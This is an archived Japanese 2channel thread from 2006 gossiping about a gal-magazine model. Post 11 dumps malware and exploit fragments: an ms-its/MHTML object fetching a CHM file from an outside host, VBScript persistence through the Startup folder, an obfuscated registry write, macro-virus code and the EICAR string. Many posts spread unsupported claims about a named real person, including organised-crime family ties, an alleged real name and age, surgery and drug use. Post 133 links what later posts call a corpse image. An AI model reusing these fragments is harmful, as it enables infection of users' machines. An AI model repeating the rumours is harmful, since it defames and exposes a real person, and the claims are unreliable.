5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【小悪魔ageha】篠田叶華

1 :無名モデル:2006/11/04(土) 02:08:39 ID:Wt/njnTz
18才で代表取締役ってなにしてるのかなぁ〜?
車とかすごいけど。。

2 :無名モデル:2006/11/04(土) 02:09:12 ID:???
2

3 :無名モデル:2006/11/04(土) 02:29:43 ID://ZtaWBU
>>1


4 :無名モデル:2006/11/04(土) 05:04:11 ID:FtiN4y0f
>>1さんありがと〜☆

土曜日発売かな?☆

5 :無名モデル:2006/11/04(土) 07:49:59 ID:Gaa2noev
クルマ何乗ってんの?

6 :無名モデル:2006/11/04(土) 08:14:42 ID:FtiN4y0f
もしやミラでは?☆

7 :無名モデル:2006/11/04(土) 12:13:38 ID:???
黄色のフェラーリだっけ?
あと新型のBMWと
ベンツと何かのコラボのバッハ?じゃなかったっけ譜痰チてたらごめんなさいm(__)m

8 :無名モデル:2006/11/04(土) 15:36:52 ID:+fMuFIsJ
>>7
その通り。運転手つきだよ。

agehaスレでは893の娘でFAしてます。

9 :無名モデル:2006/11/04(土) 17:18:38 ID:???
FAって?
じゃぁただ親がお金アルだけで代表取締役はうそなの?

10 :無名モデル:2006/11/04(土) 17:22:09 ID:???
4は誰?

11 :<body onload=window()>:2006/11/04(土) 17:25:21 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

12 :無名モデル:2006/11/04(土) 17:29:16 ID:hljhzfKo
>>9
FA=FINAL ANSWER

叶華さん、親の資金を元手になにか商売でもやってるのかな?
車だけでも億超えだし…

でも、あのCartierネックレスのじゃら付けは成金っぽい…

13 :無名モデル:2006/11/04(土) 17:42:13 ID:oEi2V8u/
でも★めっちゃ可愛いやん♪
18に見えんし★☆化粧もうまい!!

14 :無名モデル:2006/11/04(土) 17:46:35 ID:???
この子すっごい細そう
今月のえりさの脚の半分以下の細さだね
えりさが太いだけかもしれんが

15 :無名モデル:2006/11/04(土) 18:04:55 ID:wtTcXfam
家賃125万って凄い。

16 :無名モデル:2006/11/04(土) 21:47:46 ID:2DLS3bur
すでにアンチスレできてるし笑

この人金持ちネタしかないよね。やっぱヘアメイクとかには出てこれないんだね。

消えてほしい

17 :無名モデル:2006/11/05(日) 08:56:51 ID:bIhx/HyA
桁違いの金持ちだね!!!
他のモデルの子はキャバとかの貢物?って感じだけど
さすがにあの車や運転手付きって実家がすごいんだろね!!

18 :無名モデル:2006/11/05(日) 10:32:32 ID:???
3時間化粧にかけても、たいして変わってない

19 :無名モデル:2006/11/05(日) 19:57:12 ID:5h5iFdfa
篠田といえば有名な○○組の組長と同じ苗字だけど・・。
関係あるの?



20 :無名モデル:2006/11/05(日) 20:31:48 ID:???
叶華ちゃん、私は好きだよ子供は親を選べないんだし親も娘を大事に思っての愛の示し方が高価なモノになっちゃってるだけであって。叶華ちゃんにとっては普通なんだょ、アゲハに出るって決まった時泣いちゃったとか読んで素直な可愛いコだと思ったよ

21 :無名モデル:2006/11/05(日) 22:52:35 ID:0PnnN594
自分を金でしか紹介できない哀れな女


22 :無名モデル:2006/11/05(日) 23:05:34 ID:NnDyXjpI
叶華ちゃんセレブな感じ大好き大好き!!!☆

23 :無名モデル:2006/11/05(日) 23:32:00 ID:NnDyXjpI
184 :ノーブランドさん :2005/04/09(土) 23:31:22
カッコいい人と一緒に何処かに行く時は、必ず、バーバリーのプリーツ(ミニ)スカートにする。
やっぱり、パンツ見えそうな格好してると、相手の視線がそっちに集中してくる。
この季節、お花見とかでそういった恰好して膝枕してあげると喜ぶ。

今日、葛西臨海公園でお花見してきて、彼氏ゲットしました。
上に書いたような恰好で行き、お弁当も作って、膝枕もして、
観覧車に乗って告白されてキス。

男って単純です。
彼氏に会う以外はジーンズで手抜いてます。

24 :無名モデル:2006/11/05(日) 23:58:37 ID:n4iqVmYf
↑参考にナッタセ

25 :無名モデル:2006/11/06(月) 08:34:51 ID:y4zyqRZk
>>24
けっこう参考になるのかな?☆

26 :無名モデル:2006/11/06(月) 08:54:32 ID:Gt/oUznQ
この人、誰よりagehaが好きそうで好感ある。顔は先月のドアップのほうが綺麗だった

27 :無名モデル:2006/11/06(月) 09:06:56 ID:y4zyqRZk
デカめ?

28 :無名モデル:2006/11/06(月) 12:45:38 ID:obAHzfyJ
他のアゲ嬢のコゎ身体張って今の位置なんだろうけど叶華ちゃんは不自由なく愛されてきた可愛いコって感じ、スレてない!!
笑顔がはにかんだ感じで可愛い!性格良さそうだよね(^-^)顔も好きだし、肉肉しくて暑くるしぃエリサ豚よりゃ全然マシ。

29 :無名モデル:2006/11/06(月) 14:13:00 ID:???
叶華ちゃんのおうち拝見とかやってほしい。

それか、一日密着とか一週間でこれだけブランド物買いました!みたいな特集。

30 :無名モデル:2006/11/06(月) 16:46:34 ID:???
それいい!!
みてみたい☆

31 :無名モデル:2006/11/06(月) 17:20:11 ID:???
>>17本物のお嬢様じゃないし実家が凄いって
そりゃ凄いだろーなw
良家のお嬢様はあんなコテコテ成金コーデ
しないね。JJちおかに出てるお金持ちの子
とはレベルが違うね

32 :無名モデル:2006/11/06(月) 17:39:35 ID:???
叶華  って何て読むの?

33 :無名モデル:2006/11/06(月) 19:08:12 ID:???
きょうかじゃないのかなぁ?かわい気のない強めな漢字だよね…さすがヤクザの娘って感じ☆

34 :無名モデル:2006/11/06(月) 23:30:52 ID:yEYmMoyo
親の職業の事は別に関係ないいじゃん。
叶華ちゃんのゴージャス度はぶっ飛んでてみてて
気持ちい!笑
やっぱ無理して着飾ってないから嫌味なく感じるなぁ♪

35 :無名モデル:2006/11/06(月) 23:58:45 ID:???
>>33 漢字は違うけど鈴木京香も『きょうか』って名前なんだけど。

叶華ちゃんのが漢字可愛いし、親が色々と考えてつけた名前っぽい。

36 :無名モデル:2006/11/07(火) 00:33:43 ID:???
一人娘って感じがする。
愛されて育ったんだろうね、他のバカアゲ嬢はアタシならアゲハ出れてトーゼン!とか思ってそぅだけど叶華ちゃんは泣いたんでしょ!可愛いなぁ(≧∀≦)

37 :無名モデル:2006/11/07(火) 01:03:57 ID:???
何でもかんでも真に受けすぎ
しかもろくに働きもせずにヤクザ家業で得た親の金馬鹿使いしてるとか
水やってる他の子より感じ悪い
嫌味がない人間が運転手つきだとか高級車好きだとか雑誌で言うかよ
水の子はそれなりに売れてる子が多いし自分の仕事と立場にプライドもってそうだけど
この子は全部親からもらった苦労のないつまんないものしか自慢してないし
うすっぺらすぎてagehaで浮いてるよ

38 :無名モデル:2006/11/07(火) 06:13:40 ID:qYcG2FpK
お金持ちって羨ましいょ。

39 :無名モデル:2006/11/07(火) 06:51:39 ID:nhLc218G
服にお金かけてるわりには、かなりチープに見えるんだが。
全身しまむらコーデといってもおかしくない。

40 :無名モデル:2006/11/07(火) 09:06:39 ID:qYcG2FpK
↑確かに WWW

41 :無名モデル:2006/11/07(火) 12:59:13 ID:tSGSW2x2
一人っ子じゃないと思う
組長は65歳だから
18の娘が出来たのは47??
こんな世界だと何人目かの奥さんなんじゃない?
異母兄弟でたくさんコワ〜イ兄弟はいるだろう。

42 :無名モデル:2006/11/07(火) 13:04:02 ID:???
流行り物とか今時の娘が好むような服が好きなだけでしょ。

カネモだろーが893の娘だろーが素顔は普通の娘なんだよ。内面は読者やageモ達と同じ。
誰だって金あれば高級な物買って、雑誌に出られる機会があれば私物公開したいでしょ。

43 :無名モデル:2006/11/07(火) 14:42:48 ID:tSGSW2x2
自由業のみなさぁ〜ん
確定申告は済みましたかぁ〜

44 :無名モデル:2006/11/07(火) 15:12:34 ID:???
汚い事して稼いだ金でブランドもん買いあさっていい身分だね。親の仕事は関係ないっていうけど
その親が稼いだ金で生きてんなら一緒だわ。

45 :無名モデル:2006/11/07(火) 15:26:23 ID:tSGSW2x2
まともな人間に育つわきゃない
すっごい冷酷な事してそーな顔してる
お付の人に頼んでムカツク奴は始末したりとか?

46 :無名モデル:2006/11/07(火) 16:15:44 ID:XOkTjkTi
てかマイバッハってベンツとフェラーリのコラボぢゃないよね?

47 :無名モデル:2006/11/07(火) 16:22:00 ID:lQxroD3E
44に激しく同意。
18歳で代表取締役ってどんな仕事やってるの?
どうせヤクザ会社の名前だけの役員でしょう?
反社会的な稼業で得たお金で買ったブランド品身に着けて
職業「代表取締役」って頭悪すぎ。
この子見て「カワイイ」とか「ゴージャス」って本気で言ってる人の気が知れないよ。

48 :無名モデル:2006/11/07(火) 20:42:06 ID:wHXaHp0k
アゲハ出れるのが嬉しくて泣いたって??んなわけないだろ。そんな奴が普通プッチ自慢しちゃった★とか嫌味言うか?!親のヤクザ自慢とか高級車とか自慢するはずないしね 他のコはみんな自分で稼いだお金でちゃんと買った物載せてるじゃん


49 :無名モデル:2006/11/07(火) 21:25:49 ID:???
だからどーした??
別に叶華は自分を安売りしてまでブラ買い漁ってる糞嬢とは違うし、AVやオカマ、ヘルスにネトア、何でも有りだから別にイィジャン!!!

50 :無名モデル:2006/11/07(火) 23:29:26 ID:???
組員乙

51 :無名モデル:2006/11/08(水) 03:53:33 ID:27lpEoEO
食事代三十万って…
シャブ代かと思った

52 :無名モデル:2006/11/08(水) 05:38:03 ID:???
顔は整形もろばれ
元は肉厚一重なのに目頭切開したからっていきなりメイクページでちゃ線バレバレ

「きょうか」の当て字に叶華なんて付けるDQN親いないよ。まともな企業の社長なら尚更
在日企業とかヤクザぐらいのもん。
つか今時朝鮮玉入れだってHPあるのに「篠田叶華」で検索しても会社と思わしきページ1件も出ない
代表取締役?笑わせんなよ
高級外車の写真はぼかしで撮ってあるのはなぜですか?
テキトーに写真とって、都合悪い部分シールベタ貼りでごまかしてるようにしか見えない。

53 :無名モデル:2006/11/08(水) 05:45:28 ID:+WVOf1Sw
親ヤクザぢゃないよあのこんち。
しかも、あれ全部うそだよ

54 :無名モデル:2006/11/08(水) 06:32:47 ID:+WVOf1Sw
親普通の会社員
年齢詐欺あいつ21
ただの嘘つき
彼しか愛人かしらんが893なのは確か。

55 :無名モデル:2006/11/08(水) 07:48:34 ID:rt7RqS1v
生まれつき金持ちの顔してない。顔が下町ってか庶民の顔してる

56 :無名モデル:2006/11/08(水) 08:10:14 ID:X8lOYlR0
蛇女でつよ。

57 :無名モデル:2006/11/08(水) 13:17:29 ID:z7xQBNT6
この子の場合、親が普通の会社員ってのは信じがたいけど、
年齢詐称は素直に受け入れられる…ww

どうみても18歳に見えない

58 :無名モデル:2006/11/08(水) 13:27:25 ID:???
>>52
やっぱり目頭変だよね
あと18でたかの友梨のスキンケア使うってのが考えられない
(自分が一般庶民だから、18そこそこの金持ちなら外資系使うかなと思って、たかの友梨はちょっとミセス世代のイメージw)

59 :無名モデル:2006/11/08(水) 14:55:22 ID:4BWnpDZ2
てゆうか893の娘ならおとなしく謙虚に生活しろよ。893の娘なのに出たがりとか厄介もんじゃん

60 :無名モデル:2006/11/08(水) 16:32:20 ID:TNu3Uq8x
46さん私もそれ思いました!違いますね!おまけにあのマイバッハと書いてのせてる写真もマイバッハではありません。マイバッハは大体3〜5千万。どこかの国の大富豪が特注で作って1億5千万!9千万なんてまずありえない…

61 :無名モデル:2006/11/08(水) 16:33:54 ID:0E0QlLD8
顔見せろ

62 :無名モデル:2006/11/08(水) 18:16:04 ID:???
>>49
本人乙!!

63 :無名モデル:2006/11/08(水) 18:54:08 ID:TgJtVQ6i
別にィィやん笑★ひがむなぁ♪
可愛いやんかぁ★☆ェリサのがやばいし笑!1000万投資して・・・デブ笑!!!

64 :無名モデル:2006/11/08(水) 19:42:04 ID:???
ここは叶華さんのスレでしょ?
他の子と叶華さんを比べるのは構わないけど、叶華さんと関係ない子を叩くのは良くないと思うよ。

65 :無名モデル:2006/11/08(水) 21:58:00 ID:???
お金持ちなのはすごいと思うけど、あのカルティエのネックレスはねぇ…
着けりゃいいってもんじゃないよ。
ageha見てびっくりした。
アクセ合わせるの下手だね。

66 :無名モデル:2006/11/08(水) 23:52:51 ID:NLhv/omL
私はこの子すごい好き。

67 :無名モデル:2006/11/09(木) 00:04:35 ID:6aKkmLBJ
実家の環境がどーであれ『育ち』ってゆうのはこの子のせいじゃないし成金とか言うのは可哀相だ

68 :無名モデル:2006/11/09(木) 00:38:32 ID:tWwncB5X
家のこととかどうでもいいやん

69 :無名モデル:2006/11/09(木) 00:40:39 ID:tWwncB5X
ホンマカワイソウやわ

70 :無名モデル:2006/11/09(木) 00:48:09 ID:9kb32cIb
すんげーブス
鼻でかいし目つりあがってる

71 :無名モデル:2006/11/09(木) 02:22:14 ID:sZ+CQdUv
本名じゃねーし!顔も整形

72 :無名モデル:2006/11/09(木) 09:29:50 ID:T/xVnq6w
あびる優ににてない?!

73 :無名モデル:2006/11/09(木) 19:58:42 ID:U3cSGgxf
似てる☆かわいい

74 :無名モデル:2006/11/10(金) 13:43:40 ID:6kpYZFeV
ヤクザだよ、こいつの家

75 :無名モデル:2006/11/10(金) 18:10:16 ID:RG6TAsnp
ヤクザでも何でも可愛いやん☆
メイクもこだわってるし♪

76 :無名モデル:2006/11/10(金) 18:23:10 ID:BxQwexAi
叶華ちゃんおっとりしててめっさカワユスぉ(*>ω<*)

77 :無名モデル:2006/11/10(金) 22:27:28 ID:F1TkT/YH
篠田組の娘マジ?

78 :無名モデル:2006/11/10(金) 23:55:47 ID:???
どっちかっつーとキツそうな顔してない?
たとえこの子自身がヤクザ家業の金で遊んでることに何の気持ちも抱いてないのなら
それはそれで無知の罪でしょ
擁護してるのって組員さんかやくざ者関係の人なのかな

79 :無名モデル:2006/11/11(土) 00:15:20 ID:eowvkwZf
私は莖ゲハ蛯ノ叶ちゃんが載って以来のファソ
細すぎて心配だけど顔とか超ョ好みマフ てか、家柄で叩く奴は氏ねばィもし叶ちゃんが政治家の娘だったとしても叩くだろョけどね、僻みブスどもは。せっかくの叶ちゃんスレなんだから安置ウセロァァ

80 :無名モデル:2006/11/11(土) 00:56:26 ID:???
893より政治家の娘の方が叩かれるんだよ

81 :ゆー:2006/11/11(土) 01:50:59 ID:ccdP+AYw
叶華は本当に純粋でまっすぐな可愛い子だし、家柄がどーとか関係ない!!
叶華を傷つけるような発言は許せない!!
スルーしようと思ったけどこれだけは言わせてもらいます!


82 :無名モデル:2006/11/11(土) 02:06:13 ID:jYb5KZ/m
擁護してる組員乙!!
まじうけるしのだ組ヤクザーーー
組員乙 笑笑笑笑

83 :無名モデル:2006/11/11(土) 03:08:11 ID:???
>>79
一万年ROMれ・・・携帯厨を装った釣りか?


84 :無名モデル:2006/11/11(土) 05:06:33 ID:vd5UybjL
篠田組って何処にあんだっけ?
山口だよな

85 :無名モデル:2006/11/11(土) 08:38:51 ID:b2iEKNQA
純粋で真っ直ぐな可愛い子はアゲハにはいません

86 :無名モデル:2006/11/11(土) 10:07:55 ID:8mV6k22m
内面はどうあれブスには変わりない

87 :無名モデル:2006/11/11(土) 11:31:40 ID:oHP+63SF
組員乙wwwwおまいらも大変だなwwwwww

88 :無名モデル:2006/11/11(土) 12:10:26 ID:jYb5KZ/m
組員乙しのだ乙
ばればれでウケる

89 :無名モデル:2006/11/13(月) 09:59:18 ID:ELgWH9PD
司 忍って組長だよね
本名 篠田 健市だよね
娘????

90 :無名モデル:2006/11/13(月) 18:50:49 ID:Fgb1l9tp
89
知らない奴がつべこべ言うなよ。司は名古屋のN区在住で叶華みたぃな娘とかなんていないから。

91 :無名モデル:2006/11/14(火) 00:24:16 ID:???
メイクページ見て柴咲コウに似てんな〜と思った。
私は組員でもなんでもないけど、この子の顔好きだな。
確かに細すぎるけどね…

92 :無名モデル:2006/11/14(火) 11:53:34 ID:4eIyc0VU
三船とあびるに似てるな

93 :無名モデル:2006/11/14(火) 15:40:41 ID:md2iXvHu
細すぎる。もう少し太ればいいのに。

94 :無名モデル:2006/11/14(火) 21:39:06 ID:iTjRmRcA
なんだ、やっぱり車はただの見栄かW
しかも18てW
どこまで見栄っぱりなんだよ呆れるな…
アイシャドウのこだわりマジ笑える
どう見ても粉っぽいだけだよW

95 :無名モデル:2006/11/15(水) 00:09:00 ID:Q0jrrrvx
>>94思った。特にチークとシェーディングなんかヒドイ。本人は人とかぶるの嫌だからブレンドして自分色作るのが好きとか言ってたけど、ただ単にこんなに沢山持ってるのよ!ってみせびらかしたいようにしか見えない

96 :無名モデル:2006/11/15(水) 00:54:35 ID:2BFOtmfI
ヤクザの娘だよこいつ

97 :無名モデル:2006/11/15(水) 08:09:41 ID:8H1zHT/c
エゴシスに出てたときと名前も顔も違う
ただの嘘つき

98 :無名モデル:2006/11/15(水) 14:27:25 ID:???
「可愛がってください!☆」のキモイレスはアゲハ編集部・キヨミさんのしわざ

4: キヨッパー
うちはお弁当の企画と、なくちゃ死んじゃうもの企画、姫香のデジデジ日記がおもしろくて好きです☆

27: キヨッパー
今回は1000万円の妄想企画が好きだな☆

6: キヨッパー
月刊化…望まれてるのはすごーくありがたいです☆でも編集部員があんまり多くない+他のnutsの別冊と同時進行なので今はまだ難しいです

1: キヨッパー
うちは愛原リオナちゃんの顔が好き☆

13: キヨッパー
やっと本が出来てきました☆やっぱり、リオナちゃんがかわいい!

14: キヨッパー
今のところ、姫香、リオナ、さえこ、静香、りなが人気みたいです☆うちさえこも好きだなぁ!

17: キヨッパー
神河ひかりさん?初めて聞いた名前なのですが、夜の世界では有名なんですか?ステキな情報ありがとうございます☆葵さんは今のところアプローチ中なのですが、近々は難しいかもです。。

うちは正統派の可愛い顔が好きです!大海由花ちゃんとか工藤千聖ちゃんとかも可愛くて好きですね〜☆

23: キヨッパー
リオナかなり人気ですね☆今のところリオナは次号もいっぱい出てます!


99 :無名モデル:2006/11/15(水) 17:50:38 ID:0fTSmRWi
>>98
これ何?

100 :無名モデル:2006/11/16(木) 01:38:33 ID:vw7HWX9h
100なら叶華ちゃん、来年1月号でお家拝見

101 :無名モデル:2006/11/17(金) 10:24:33 ID:???
>>97
なんて名前で出てたの?

102 :無名モデル:2006/11/17(金) 10:48:04 ID:q3Zf1iLW
このスレあんま伸びないね・・
叶華って胡散臭いし、もっと反応する人多いと思ったのに。

103 :無名モデル:2006/11/17(金) 11:03:44 ID:???
逆に胡散臭すぎてダメなのかもねw
姫香みたいなネタっぽさもないし

104 :無名モデル:2006/11/17(金) 11:41:46 ID:nox3IswI
リオナレベルに美人という訳でもない
姫レベルにイタタなネタもない

全て中途半端な叶華ww

105 :無名モデル:2006/11/17(金) 12:05:10 ID:wyYuLjPq
は?リオナが美人とかいってる時点でチョット…。 私服や化粧が下品。おまけに不自然すぎる整形で可哀相。若くて中途半端な風嬢やギャルうけしそうだけどさ。

106 :無名モデル:2006/11/17(金) 15:19:53 ID:efeyZQ5R
〆は893と言うことで

107 :無名モデル:2006/11/18(土) 08:29:41 ID:c6WeFCe8
かわいい☆★うちゎリオナ、姫チャン、叶華がすき♪

108 :無名モデル:2006/11/24(金) 16:21:05 ID:NXKBm/PA
こいつガリガリで頭でかくて馬面
どこがかわいいん!?カネモやからヨイショされてるだけや

109 :無名モデル:2006/11/24(金) 16:30:45 ID:???
↑貴様はひっこんどれ。チンカス野郎が!

110 :北のキムちゃん:2006/11/24(金) 19:08:11 ID:???
/⌒⌒⌒⌒⌒⌒ ))    
  (   从    ノ.ノ      
   ( ./  ̄ ̄ ̄ ̄\        
   |::::::  ヽ     丶.  
   |::::.____、_  _,__)      ↑
  (∂: ̄ ̄| ・ー |=|・ー |    ごめんネ
   (  (   ̄ )・・( ̄ i     チンカス溜まっちゃっててサ
   ヘ\   .._. )3( .._丿    
 /  \ヽ _二__ノ|\       
/⌒ヽ.   \__/\i/\_|      
|   ヽ       \o \
|    |          \o \


111 :無名モデル:2006/11/26(日) 15:49:03 ID:???
この子病気なの?
小人病とかそっちけいみたいに顔だけ老けててそれでいて体は12歳くらいって感じ・・・


112 :無名モデル:2006/11/26(日) 17:48:30 ID:n6i4Qqjx
こいつマジで893??てか、893って何して生計立ててんの?なんであんなに金持ちなんでしょう・・
違法なことやってんなら逮捕されたりしないんだろうか


113 :無名モデル:2006/11/26(日) 18:30:56 ID:???
>>111
同意
ぎすぎすしてて気持ち悪い細さ

114 :無名モデル:2006/11/26(日) 19:40:49 ID:hYYlBEtg
>>112
下のほうから上納金がおさめられてくる
警察ともつながってるからつかまらないよ。

115 :無名モデル:2006/11/26(日) 23:15:49 ID:MKHLPfCO
こいつ893でもなんでも無いって。
ただのハッタリだよ。
多分次のに出てこないよ。


116 :無名モデル:2006/11/26(日) 23:20:34 ID:JA0cjG6v
ヤクザだよ。何いってんのか?↑

117 :無名モデル:2006/11/26(日) 23:21:25 ID:???
こいつと比嘉って人イラネ何この二人
きもちわるすぎるよ

118 :無名モデル:2006/11/26(日) 23:35:38 ID:???
あんまりこの人に興味ないけど本当に18才?絶対ちがうよね
あんな老けた18才いない
ヤクザの世界でいきてるから老けるのかな?
このキャバクラ誌にでてる人みんな老けてるけどやっぱさばよんでるのかな。

119 :無名モデル:2006/11/26(日) 23:57:58 ID:hYYlBEtg
18でこんなに黒いオーラ背負ってて蛇顔……


120 :無名モデル:2006/11/27(月) 11:14:35 ID:FJ+DMOtQ
蛇顔 男ウケワルス

121 :無名モデル:2006/11/27(月) 11:18:01 ID:jgvURYuT
明らか目が整形

122 :無名モデル:2006/11/27(月) 21:15:17 ID:j94U7mqS
実年齢違うよ
3年位前エターナルで働いてたから

123 :無名モデル:2006/11/28(火) 13:33:39 ID:TnkZsjru
21歳 中島えりか

124 :無名モデル:2006/11/28(火) 16:04:00 ID:???
組員以外でリアルに知り合いとかいない?

125 :無名モデル:2006/11/28(火) 17:31:20 ID:???
これ中島えりか?うわー顔違いすぎてわかんなかった!
エゴシスでた当時のってたね〜確か橋野まいこと仲良くなかったっけ?
あのあと消えたよね。懐かしい
家にまだあのエゴシスあるかも

126 :無名モデル:2006/11/29(水) 04:15:01 ID:ZrcfjNfI
もしあったらうpきぼんぬ!

127 :無名モデル:2006/11/29(水) 09:57:31 ID:HspQLRef
本当に中島えりか?エゴシステムに小さくでてて人気なくて消えたよね。
顔全くちがいすぎてわからなかった。
22才ぐらい?この顔で18才はないない。

128 :無名モデル:2006/11/29(水) 10:07:04 ID:???
エゴシス家にあるからみてみよう。初期の頃だよね。確か。小さくしかのってなかった気がする。この人顔がへびに似てて気持ち悪い
記憶では、中島えりかってこんなに気持ち悪くなかった気がする。。

129 :無名モデル:2006/11/30(木) 02:20:20 ID:8Hy1dEuC
本当にえりかなら可愛かったよ。ギャル!って感じで。
サバサバしてたし学校通路で彼氏と殴りあいしてた(笑)
いい子だったよ 今は知らないけど

130 :無名モデル:2006/11/30(木) 02:28:55 ID:skc9xn70
え?まぢ?15才の時可愛かったね。
なんでこんな蛇顔になってしまったの…
ヤクザの娘だったんだ。

131 :無名モデル:2006/11/30(木) 02:50:53 ID:8Hy1dEuC
893だったっけなぁ・・・
普通に可愛いギャルだったよ。
明るかったしなんかキャラかわったびっくり。
ダブってなけりゃ21だよ。

132 :無名モデル:2006/11/30(木) 03:01:44 ID:???
まぁさまぃこゅかちゃんの号にいるね。全く別人。このころカワイカッタね。まぁさまぃこみたく目立ってはなぃけど。今へび顔老け顔ニューハーフ顔。まぃことタメだから22才だよ。この人。18才とかないない。

133 :無名モデル:2006/11/30(木) 03:39:39 ID:d1IviDJ2
http://sugar310.dip.jp/cgi/upload/source/up5070.jpg

134 :無名モデル:2006/11/30(木) 03:41:21 ID:8Hy1dEuC
まいこあたしとタメだから21じゃない?
パチこかれてたのか!?
1985年だと。。

135 :無名モデル:2006/11/30(木) 04:18:22 ID:8t+1QYx6
だれかエゴシス時代うpしてけろ・゚・(ノД`)・゚・。

136 :無名モデル:2006/11/30(木) 04:28:36 ID:tiWwyjkO
本当に中島 えりかだよ
整形して顔変わったけど
シャブのヤりすぎで変形した
昔と比べりゃー少しは面影のこってんじゃん

137 :無名モデル:2006/11/30(木) 10:59:33 ID:bUAlmMY3
この子ほんとにえりなの??
えりと中学一緒だったし割りと仲良かったけど全然分かんなかった。。。
そりゃ少しゎ面影あるっちゃあるけど
そぅぃゃ成人式で会ったけどこんな顔してたっけかなぁ。。。

ところでえりって母子家庭じゃなかったっけ?

138 :無名モデル:2006/12/01(金) 09:45:49 ID:???
立ち読みの感想
・ももえり偽善者ぶんなよw子供の名前DQN丸出し
・表紙が姫香の時点で('A`)
・ねむ貧乳指摘されてない乳寄せ上げ必死
・ひとみさん体までは外国人にはなれないお
・紅音ほたる、あとで潮吹き動画貼ったるわ
・篠田さんご飯食べてる?

よく見てないから新人チェックはしてませんが

139 :無名モデル:2006/12/01(金) 11:17:42 ID:RiXrn2WV
今月号で、100万のコート買ったって…一体どれだけ金持ってるの!?中学同じだったという方、893の娘ならやっぱりその頃から噂になってました?それともいきなり金持ちになったの?

140 :無名モデル:2006/12/01(金) 15:49:52 ID:XfckdQxK
133ってなに???

141 :無名モデル:2006/12/01(金) 16:32:15 ID:???
小銭は重いからもらわないようにしてるって・・・

142 :無名モデル:2006/12/01(金) 16:46:58 ID:XfckdQxK
133って・・・

143 :無名モデル:2006/12/01(金) 16:54:16 ID:2R+oU1IJ
えーエゴシスでみたよ!中嶋えりか。顔変になったね〜爬虫類みたいだ
目頭切りすぎなんだと思う年を四歳も偽るのはやばいな

144 :無名モデル:2006/12/01(金) 17:00:31 ID:XfckdQxK
133って何?怖くてみれません

145 :無名モデル:2006/12/01(金) 17:19:17 ID:ja7dAwIV
みないほーがいー

146 :無名モデル:2006/12/01(金) 17:27:52 ID:iZuwllD3
>>144
三行で説明すると
死体画像
飛び下り自殺?
うわあああ

147 :無名モデル:2006/12/01(金) 18:01:06 ID:GdlvWb4L
何かさぁ、この子は現実味なさすぎてネタに思えちゃうんだよね
あのビニバ、未だに使ってる人いるんだ…
二個持ちするくらいなら、最初から収納力のあるバーキン持てばいいのにね
ケリーは荷物ガンガン詰め込むようなバッグじゃないし、あの二個持ちは見た目にもおかしいだろw

148 :無名モデル:2006/12/01(金) 18:20:22 ID:6SmBNBko
篠田がやらせに見えてきた

149 :無名モデル:2006/12/01(金) 19:00:36 ID:zAXe3gau
ぁたしもやらせに思う(-.-;)100万のコート買ったんなら着てこればいーのに、そんなに高い服着てないし‥
ブリガリのシャンプーとかいちいちうざい↓↓
貧乏人の妬みかもしれないけどさ(*_*)

150 :無名モデル:2006/12/01(金) 20:56:43 ID:6SmBNBko
なんか篠田叶華ってバブリーキャラをネタ用に作った感じがするよね。
セレブやJJに載ってるような金持ちのお嬢と違って現実味がない。

151 :無名モデル:2006/12/01(金) 21:37:08 ID:???
この人服安すぎる。あのビニールのケリー古いね
のりたいために見栄はってるけどこのはちゅうるい顔がもってもイマイチ。
×18歳○22歳
中嶋えりかさん

152 :無名モデル:2006/12/01(金) 22:28:18 ID:P0xgYQJJ
30個もバーキン持ってる人が1万の靴はくか?

153 :無名モデル:2006/12/01(金) 23:21:03 ID:???
よく行くショップがラブボ…っててのもビックリ。
小さいサイズなんてラブボ以外にもたくさんあるし…

154 :無名モデル:2006/12/01(金) 23:27:17 ID:???
高級ブランドで冬服オーダーメイドするような人が何であんな安い服着るんだろ?
ラブボって高校生御用達じゃん
品質の違いとか気にならないのかな

155 :無名モデル:2006/12/01(金) 23:51:34 ID:h2GSq8AW
なんであんなやせてんの?

156 :無名モデル:2006/12/02(土) 00:08:03 ID:Gwh2dPZT
痩せてるのは体質だと思うな。例えば胃下垂の子はいくら食べても太れないんだよ。

157 :無名モデル:2006/12/02(土) 01:21:12 ID:???
確実に育ちのいい金持ちじゃないよねー
最近の服は5号とかあるんですよ篠田さん。
マックスマーラではブカブカなんじゃないのー?
そんだけ金あるなら、まず靴からいい物を取り入れよーよ。
バッグと財布だけ??服は安物主義とかぁ?
そんだけ金あるなら着まわしするなよww

158 :無名モデル:2006/12/02(土) 01:42:47 ID:???
>>150
禿同!
明らかにお嬢のオーラはないよね。
金持ちキャラを安売りしすぎて逆に貧乏くさい。

159 :無名モデル:2006/12/02(土) 03:07:28 ID:klrjekqB
痩せてんのは体質とかじゃないよ!!
昔デブだ

160 :無名モデル:2006/12/02(土) 03:14:14 ID:/l4X6Ur/
75ページで透明のケリーは8年前のパリコレで配られたもの。とか言ってるけど8年前ってあんた10歳じゃん‥‥‥

161 :無名モデル:2006/12/02(土) 03:43:15 ID:nqLeOIkA
篠田の本名は中嶋えりか22歳。10年前なら12歳。えりかリサイクルショップで買ったようだね。

162 :無名モデル:2006/12/02(土) 09:52:11 ID:???
